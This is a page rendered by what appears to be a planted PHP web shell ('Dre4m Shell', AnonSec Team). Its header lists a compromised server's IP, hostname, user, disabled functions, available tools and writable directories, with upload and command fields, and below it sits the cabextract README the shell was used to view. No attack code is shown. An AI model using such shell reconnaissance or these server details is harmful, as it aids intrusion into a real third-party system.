Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.217.239.90
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/doc/cabextract/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/doc/cabextract/README
cabextract 1.9 - a program to extract Microsoft Cabinet files.
(C) 2000-2018 Stuart Caie <kyzer@cabextract.org.uk>
This is free software with ABSOLUTELY NO WARRANTY.

Cabinet (.CAB) files are a form of archive, which Microsoft uses to
distribute their software, and things like Windows Font Packs. The
cabextract program unpacks these files.

For more information, see https://www.cabextract.org.uk/
or run the command 'cabextract --help'.

Microsoft cabinet files should not be confused with InstallShield cabinet
files. InstallShield files are generally called "_sys.cab", "data1.hdr"
"data1.cab", "data2.cab" and so on, and are found in the same directory as
"setup.exe". They begin with the magic characters "ISc(" rather than
"MSCF". cabextract will print the message "This is probably an
InstallShield file." when it finds such a file. The file "doc/magic" in
the cabextract source archive includes additional file-identification
rules for the UNIX file(1) command, which distinguishes between Microsoft
and InstallShield cabinet files.

Example usage:

Extracting files from a cabinet file:
$ cabextract wibble.cab

Extracting files from an executable which contains a cabinet file:
$ cabextract wibble.exe
[cabextract will automatically search executables for embedded cabinets]

Extracting files from a set of cabinet files; wib01.cab, wib02.cab, ...:
$ cabextract wib01.cab
[cabextract will automatically get the names of the other files]

Extracting files to a directory of your choice (in this case, 'boogie'):
$ cabextract -d boogie wibble.cab
[cabextract will create the directory if it does not already exist]

Listing files from a cabinet file:
$ cabextract -l wibble.cab

Testing the integrity of a cabinet file, without extracting it:
$ cabextract -t wibble.cab

Stuart Caie <kyzer@cabextract.org.uk>, April 2016

Anon7 - 2022
AnonSec Team